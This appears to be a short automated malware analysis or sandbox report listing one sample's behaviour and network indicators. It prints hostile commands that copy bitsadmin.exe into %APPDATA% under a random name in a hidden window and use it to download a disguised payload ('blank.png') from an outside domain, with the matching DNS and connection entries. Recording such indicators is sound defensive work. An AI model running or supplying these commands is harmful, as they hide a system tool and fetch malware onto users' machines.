Technical Information
- '%APPDATA%\cjdu.exe' /transfer WTaQVA /download https://greytinfo.com/earlgrey/01020310155/blank.png %APPDATA%\blank.png
- %APPDATA%\cjdu.exe
- 'gr###info.com':443
- DNS ASK gr###info.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\CjDU.exe' (with hidden window)
- '%APPDATA%\cjdu.exe' /transfer WTaQVA /download https://greytinfo.com/earlgrey/01020310155/blank.png %APPDATA%\blank.png' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\CjDU.exe